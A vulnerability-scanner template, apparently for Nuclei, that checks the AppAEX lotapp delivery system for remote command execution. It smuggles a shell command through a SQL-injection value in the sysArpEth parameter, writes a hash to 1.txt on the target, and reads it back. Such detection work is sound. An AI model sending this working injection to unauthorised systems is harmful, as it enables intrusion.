id: APPAEX-lotapp-rce

info:
  name: appex-lotapp应用交付系统static_arp_list_action.php文件sysArpEth参数命令执行漏洞
  author: Str1am
  severity: high
  tags: APPAEX,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/acc/bindipmac/static_arp_list_action.php?chkSysArpList[0]=0&sysArpEth[0]=1%27%20and%200%20union%20select%20%27a||echo%20202cb962ac59075b964b07152d234b70>1.txt||b--&sysArpIp[0]=1&sysArpMac[0]=1"
      - "{{BaseURL}}/acc/bindipmac/1.txt"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "964b07152d234b70"
        part: body
        condition: and